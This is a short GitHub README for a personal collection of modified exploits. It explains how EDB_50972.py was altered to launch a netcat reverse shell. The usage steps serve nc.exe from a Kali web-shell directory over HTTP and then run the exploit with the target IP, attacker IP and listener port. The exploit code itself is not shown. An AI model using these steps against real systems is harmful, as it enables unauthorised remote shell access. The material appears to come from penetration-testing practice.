Skip to content

Latest commit

 

History

History
10 lines (8 loc) · 491 Bytes

README.md

File metadata and controls

10 lines (8 loc) · 491 Bytes

Description:

I will keep my modified exploits here in this repo.

EDB_50972.py:

Original exploit expects a payload generated by msfvenom. I slightly modified the code to execute nc reverse shell.

Usage:

  1. (In Kali) Go in /usr/share/SecLists-master/Web-Shells/FuzzDB directory and start http server using python3 -m http.server 80
  2. Exploit takes 4 arguments and format is: python3 EDB_50972.py "target IP" "your local machine ip" "local revshell listening port" nc.exe